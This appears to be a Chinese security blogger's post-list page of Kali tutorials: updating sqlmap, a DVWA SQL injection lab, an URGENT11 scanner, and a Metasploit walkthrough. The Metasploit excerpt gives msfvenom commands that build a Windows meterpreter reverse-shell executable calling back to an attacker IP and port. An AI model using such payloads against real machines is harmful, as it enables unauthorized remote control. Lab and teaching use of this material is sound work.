Kali
关注
分享
扫一扫
文章平均质量分 54
Phishingman
网络安全工程师
展开
-
Kali中更新sqlmap步骤(直接更新会失败)
1. 问题场景如果安装老版本的sqlmap(Kali默认安装)经常破解不了,所已建议更新到最新版本。更新命令为:sqlmap -update,直接执行这个命令,总是出错。2. 解决办法解决方法: 找到sqlmap的路径/usr/share/salmap执行 cd /usr/share/然后删掉sqlmap rm -rf sqlmap/然后执行 git clone https://github.com/sqlmapproject/sqlmap然后进入文件夹直接执行.py文件即可,或者加入到原创 2020-07-10 08:01:12 · 22733 阅读 · 5 评论 -
MSF Exploit入侵电脑实践(Win7/Win10皆可)
msf exploit入侵电脑(Win7/Win10皆可)需要的工具:msfvenom . msfconsole (kali里面有)msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exemsfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.144 LPORT=6666 -f exe -o xss.exemsfven原创 2020-07-10 07:52:19 · 6098 阅读 · 1 评论 -
Kali安装urgent11-detecter扫描设备
发现的11个漏洞由6个关键漏洞组成,可能导致远程代码执行:1.CVE-2019-12256:在解析IPv4数据包IP选项时的栈溢出2.CVE-2019-12255:TCP紧急指针 为 0时导致整数下溢3.CVE-2019-12260:由格式错误的TCP AO选项导致的TCP紧急指针状态混乱4.CVE-2019-12261:连接到远程主机时TCP紧急指针状态混乱5.CVE-2019-12263:由竞争条件导致的TCP紧急指针状态混乱6.CVE-2019-12257:在ipdhcpc中的DHCP原创 2020-07-09 08:35:31 · 475 阅读 · 0 评论 -
DVWA实践: SQL Injection (3 LEVEL) (sqlmap攻破+john解析)
准备工作在VirtureBox安装DVWA虚拟机(基于msf)准备一台同局域网的KALI Linux键盘Session 1:手动sql注入(DVWA security level low)<?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id =原创 2020-07-09 08:14:22 · 563 阅读 · 0 评论